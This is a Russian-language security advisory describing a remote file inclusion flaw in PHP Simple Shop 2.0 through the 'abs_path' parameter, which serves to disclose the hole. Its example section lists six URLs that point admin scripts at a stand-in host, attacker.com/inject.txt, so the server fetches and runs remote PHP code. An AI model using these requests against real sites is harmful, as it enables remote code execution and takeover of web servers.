PHP-инклюдинг в PHP Simple Shop

Дата публикации:	11.08.2006
Дата изменения:	17.10.2006
Всего просмотров:	3024
Опасность:	Высокая
Наличие исправления:	Нет
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:	Удаленная
Воздействие:	Компрометация системы
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	PHP Simple Shop 2.x
	Уязвимые версии: PHP Simple Shop 2.0, возможно другие версии. Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "abs_path" в различных сценариях. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: http://victim/[phpsimpleshop_path]/admin/index.php?abs_path=http://attacker.com/inject.txt? http://victim/[phpsimpleshop_path]/admin/adminindex.php?abs_path=http://attacker.com/inject.txt? http://victim/[phpsimpleshop_path]/admin/adminglobal.php?abs_path=http://attacker.com/inject.txt? http://victim/[phpsimpleshop_path]/admin/login.php?abs_path=http://attacker.com/inject.txt? http://victim/[phpsimpleshop_path]/admin/menu.php?abs_path=http://attacker.com/inject.txt? http://victim/[phpsimpleshop_path]/admin/header.php?abs_path=http://attacker.com/inject.txt? URL производителя: www.turnkeywebtools.com/phpsimpleshop Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки:	PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion

PHP-инклюдинг в PHP Simple Shop

Подпишитесь на email рассылку